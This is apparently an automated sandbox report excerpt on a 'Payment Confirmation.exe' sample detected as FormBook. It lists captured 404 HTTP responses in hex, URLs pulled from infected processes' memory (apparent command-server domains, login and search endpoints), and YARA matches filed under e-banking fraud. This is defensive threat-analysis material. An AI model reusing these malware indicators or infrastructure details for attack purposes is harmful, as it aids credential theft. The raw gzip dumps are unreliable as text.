                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:32:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vSaKrbZN%2Bq9IqCYv3MNWx4qYyvjA04pFozupSPaqS4AIXaVHpo9FOqsE3e7%2FXgSeyChSf9zQSP%2B0Oq8TR4N8Pvq64SK8M5tMT%2BhckvTzqhJbON1gLunSC6soS4CXPxmThu8mNrb8ZqrJtQea"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c27251de6e9f4-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124803&min_rtt=124803&rtt_var=62401&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 56 db 6e e3 36 10 7d cf 57 b0 2e 0a 6c 01 33 91 65 c5 6b cb f1 a2 de 74 83 02 05 ba 8b a2 28 d0 47 5a 1c 59 44 28 52 25 29 5f 5a ec bf 17 94 1c 47 17 d2 56 da f2 45 e2 65 66 38 33 67 ce f0 e6 e6 e6 e1 9b 1f 3f 3f fe f6 c7 97 4f 28 33 39 ff 70 f3 50 7f 10 42 e8 21 03 42 4f bf 39 18 82 32 63 0a 0c 7f 96 6c b7 1a 3d 4a 61 40 18 6c 8e 05 8c 50 52 cf 56 23 03 07 73 67 55 2c 51 92 11 a5 c1 ac 4a 93 e2 f9 c8 ab 87 24 19 60 2b af 24 6f 28 12 12 27 76 cb 2b f8 45 91 6d 4e de 22 f1 e9 50 30 05 ba 21 12 b4 ce 0a 92 c3 6a b4 63 b0 2f a4 32 8d 63 7b 46 4d b6 a2 b0 63 09 e0 6a 32 46 4c 30 c3 08 c7 3a 21 1c 56 93 db b3 2a c3 0c 87 0f 51 10 a1 5f a4 41 4f b2 14 f4 e1 ae 5e ac 0f 68 73 e4 80 6c dc 4e e1 4a b4 3e 09 db b1 91 f4 88 fe 3e 4f ed 48 a5 30 38 25 39 e3 c7 18 ad 15 23 7c 8c 7e 02 be 03 c3 12 32 46 9a 08 8d 35 28 96 2e fb 62 9a fd 05 31 9a 44 c5 a1 bd c9 99 00 9c 01 db 66 26 46 93 db 28 9c df bf 9f 44 e1 a2 7d 6a 43 92 e7 ad b2 3e e0 44 72 a9 62 f4 6d 5a 8d f6 b1 97 bd f0 69 1a 4e 83 f6 5e 41 28 65 62 1b a3 ce 7a 4e d4 96 89 d6 f2 d7 f3 9f 86 c4 30 29 c6 28 95 d2 80 ea c4 83 32 5d 70 72 8c d1 86 cb e4 f9 7f 30 77 6b 53 4d 98 e8 59 aa a5 30 87 d4 c4 88 94 46 ba 94 62 55 47 b1 bf ff 7a 19 34 09 9a 19 68 98 56 a0 0b 29 34 60 26 52 d9 31 ff 12 d7 c7 6a 38 c5 b5 21 a6 d4 38 91 14 5c a8 a9 d3 7f 1f 04 df 5d 92 56 40 b4 14 7e f9 f0 be 29 7f 29 05 dd 98 26 a6 f2 6b dc f4 d7 da c2 16 f9 1e 6f 83 6a 38 75 da 78 5a 60 10 ee 0a 57 03 ad 0a 0a 20 26 46 42 9e 7e af e2 3a 5c 4c d7 d1 da 8d eb a7 6a 0c ba 11 f1 38 35 5c 05 66 Data Ascii: 3ebVn6}W.l3ekt(GZYD(R%)_ZGVEef83g??O(39pPB!BO92cl=Ja@lPRV#sgU,QJ$`+$o('v+EmN"P0!jc/2c{FMcj2FL0:!V*Q_AO^hslNJ>>OH08%9#|~2F5(.b1Df&F(D}jC>DrbmZiN^A(ebzN0)(2]pr0wkSMY0FbUGz4hV)4`&R1j8!8\]V@~))&koj8uxZ`W &FB~:\Lj85\f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:32:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv6GgZBnfXbZSTpaLJflo086oP8T5eFZ3R1fhRIQa9uVWgcHLise61zXz9tazkQ55oroGuOfzhqSMRuv34gmgptUoUFdiNZy1A51Os9%2FU%2BoGuTnAxwi2s6X05qK0g7tRA4%2BJyg20yCl5j5%2FG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c2735ac28763d-JAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114537&min_rtt=114537&rtt_var=57268&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 32 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a d9 72 a3 4a 96 ef f7 2b 34 ee 98 99 ee a0 5c ec 9b af 5d 33 80 10 20 09 04 48 48 42 2f 37 10 24 8b 58 c5 2e 4d f4 07 cd 6f cc 97 4d 20 bb aa 5c b6 54 e5 db 3d 0f 83 23 6c 32 cf 92 67 3f 38 33 7f fb ed b7 c7 7f 19 2f 84 95 ad 8b a3 b0 4e 93 2f bf 3d 3e ff 19 8d 46 a3 c7 10 38 de cb 6b 0a 6a 67 14 d6 75 71 0f 8e 4d d4 3e dd 09 79 56 83 ac be af 4f 05 b8 1b b9 cf a3 a7 bb 1a f4 35 3c b0 f8 7d e4 86 4e 59 81 fa a9 a9 fd 7b e6 ee 26 1f c7 0d c1 fd 40 5f e6 c9 2b 46 59 7e ef 0e a0 9b 84 7a e9 04 a9 f3 67 28 c4 be 88 4a 50 bd 22 41 7e c0 cd 9c 14 3c dd b5 11 e8 8a bc ac 5f a1 75 91 57 87 4f 1e 68 23 17 dc 5f 06 9f 46 51 16 d5 91 93 dc 57 ae 93 80 27 f4 f3 37 56 75 54 27 e0 0b 81 10 23 2d af 47 93 bc c9 bc 47 f8 79 f2 19 a1 aa 4f 09 18 0d 76 7b 31 97 5b 55 2f c4 c3 b3 cf bd d3 e8 bf be 0d 87 c7 cf b3 fa de 77 d2 28 39 3d 8c b8 32 72 92 4f 23 19 24 2d a8 23 d7 f9 34 aa 9c ac ba af 40 19 f9 bf bf 27 ab a2 33 78 18 a1 44 d1 ff 08 4c a2 0c dc 87 20 0a c2 fa 61 84 7e 26 30 86 a4 51 02 63 7f c4 da 3b 6e 1c 94 83 0e f7 6e 9e e4 e5 c3 e8 2f fe e5 f9 11 ed 2b 0c 9b e0 18 8e fc 08 2b 1c cf 8b b2 e0 61 f4 66 3e 75 ca 20 ca 7e 98 fe fb b7 b7 0a b8 75 94 67 9f 46 7e 9e d7 a0 7c 63 0f 2f aa 8a c4 39 3d 8c f6 49 ee c6 ff 07 cb 7d 1e 5c ed 44 d9 bb 95 9e a9 ee 13 e0 d7 0f 23 a7 a9 f3 6b 4c ef cb 67 2b be 87 7f 17 66 84 22 af 3d f0 6a e9 12 54 45 9e 55 e0 3e ca fc fc cd f2 5f ed 2a 5c 9e ab e4 55 ed d4 4d 75 ef e6 1e b8 16 35 cf ee 27 11 e4 5f 7f 46 5d 02 a7 ca b3 db f4 18 f9 9a fe 67 2e 78 6b 53 b7 be e8 f5 e9 b5 be c3 Data Ascii: 132b:rJ+4\]3 HHB/7$X.MoM \T=#l2g?83/N/=>F8kjguqM>yVO5<}NY{&@_+FY~zg(JP"A~<_uWOh#_FQW'7VuT'#-GGyOv{1[U/w(9=2rO#$-#4@'3xDL a~&0Qc;nn/++af>u ~ugF~|c/9=I}\D#kLg+f"=jTEU>_*\UMu5'_F]g.xkS
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:32:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKdKh0bTVYlYi69DU%2Fr8o1mG%2Fs%2F4LpZf1N2EeUf%2BspXCH67KrXkxz1S0WAqG7lIkLvhLcdkNHmyCzPl52i4%2B3fquAUySuU%2FT4TnE2odl82Xo%2BH5mW5Dav8%2ByYHsvFxXbyG4wus4al8dGm2Nf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c274668d1b1d7-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126590&min_rtt=126590&rtt_var=63295&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=970&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a d9 72 a3 4a 96 ef f7 2b 34 ee 98 99 ee a0 5c ec 9b af 5d 33 80 90 40 12 08 90 40 42 2f 37 58 92 45 ac 62 97 26 fa 83 e6 37 e6 cb 26 b0 6b 71 d9 52 55 dd ee 79 18 1c 61 93 79 96 3c fb c1 99 f9 db 6f bf 3d fe cb 74 2d 6c 6d 4d 9c 44 4d 96 7e fa ed f1 e5 cf 64 32 99 3c 46 c0 f1 3f bf 66 a0 71 26 51 d3 94 f7 e0 d4 c6 dd d3 9d 50 e4 0d c8 9b fb e6 5c 82 bb 89 f7 32 7a ba 6b c0 d0 c0 23 8b df 27 5e e4 54 35 68 9e da 26 b8 67 ee 6e f2 71 bc 08 dc 8f f4 55 91 be 62 94 17 f7 de 08 ba 49 a8 55 4e 98 39 7f 86 42 1c ca b8 02 f5 2b 12 e4 3b dc dc c9 c0 d3 5d 17 83 be 2c aa e6 15 5a 1f fb 4d f4 e4 83 2e f6 c0 fd f3 e0 c3 24 ce e3 26 76 d2 fb da 73 52 f0 84 7e fc ca aa 89 9b 14 7c 22 10 62 a2 16 cd 64 56 b4 b9 ff 08 bf 4c be 20 d4 cd 39 05 93 d1 6e 9f cd e5 d5 f5 67 e2 f1 71 0b ff 3c f9 af af c3 f1 09 8a bc b9 0f 9c 2c 4e cf 0f 13 ae 8a 9d f4 c3 44 02 69 07 9a d8 73 3e 4c 6a 27 af ef 6b 50 c5 c1 ef ef c9 ea f8 02 1e 26 28 51 0e df 03 d3 38 07 f7 11 88 c3 a8 79 98 a0 1f 09 8c 21 69 94 c0 d8 ef b1 5c c7 4b c2 6a d4 e1 de 2b d2 a2 7a 98 fc 25 78 7e be 47 fb 02 c3 66 38 86 23 df c3 4a c7 f7 e3 3c 7c 98 bc 99 cf 9c 2a 8c f3 ef a6 ff fe f5 ad 06 5e 13 17 f9 87 49 50 14 0d a8 de d8 c3 8f eb 32 75 ce 0f 13 37 2d bc e4 ff 60 b9 8f a3 ab 9d 38 7f b7 d2 0b d5 7d 0a 82 e6 61 e2 b4 4d 71 8d e9 7d f5 62 c5 f7 f0 6f c2 4c 50 e4 b5 07 5e 2d 5d 81 ba 2c f2 1a dc c7 79 50 bc 59 fe 8b 5d 85 e7 e7 2a 79 dd 38 4d 5b df 7b 85 0f ae 45 cd 8b fb 49 04 f9 d7 1f 51 57 c0 a9 8b fc 36 3d 46 be a6 ff 91 0b de da d4 Data Ascii: 132c:rJ+4\]3@@B/7XEb&7&kqRUyay<o=t-lmMDM~d2<F?fq&QP\2zk#'^T5h&gnqUbIUN9B+;],ZM.$&vsR~|"bdVL 9ngq<,NDis>Lj'kP&(Q8y!i\Kj+z%x~Gf8#J<|*^IP2u7-`8}aMq}boLP^-],yPY]*y8M[{EIQW6=F
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:32:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKYi6hmg3r8powNe03snw8OPkx1llnns3LEoE2zt2HcW14ETWNI0PeMdYKd1SLlO9IEWTQ8R1A58ETMS9IRqKJRgB1T4SO6pF4ePfs3BF%2FDVW2LVeBJNEOeyKdv7AoCXiwijUAv0M8%2BPhCLz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c2757085325a3-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=131545&min_rtt=131545&rtt_var=65772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=517&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 38 61 63 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 Data Ascii: 28ac<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; l
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:33:02 GMTServer: Apache/2.4.63 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:33:05 GMTServer: Apache/2.4.63 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:33:08 GMTServer: Apache/2.4.63 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:33:11 GMTServer: Apache/2.4.63 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: auditpol.exe, 0000000A.00000002.3732286198.000000000597C000.00000004.10000000.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.0000000003CFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: firefox.exe, 0000000C.00000002.1841738172.000000001C344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://economia.uol.com.br/0492/?slIx=
                Source: yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3733429458.0000000004AD5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.stuhlmann.cloud
                Source: yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3733429458.0000000004AD5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.stuhlmann.cloud/c8yp/
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: auditpol.exe, 0000000A.00000002.3729900422.000000000350C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3729900422.000000000350C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: auditpol.exe, 0000000A.00000003.1729521923.0000000008681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: auditpol.exe, 0000000A.00000002.3732286198.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3734265785.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.0000000002EDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=curiosa.news
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: auditpol.exe, 0000000A.00000002.3732286198.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3734265785.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.0000000002EDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: auditpol.exe, 0000000A.00000003.1733478145.00000000086A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: auditpol.exe, 0000000A.00000002.3732286198.0000000004E7E000.00000004.10000000.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731738371.00000000031FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.tieniu09.xyz

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
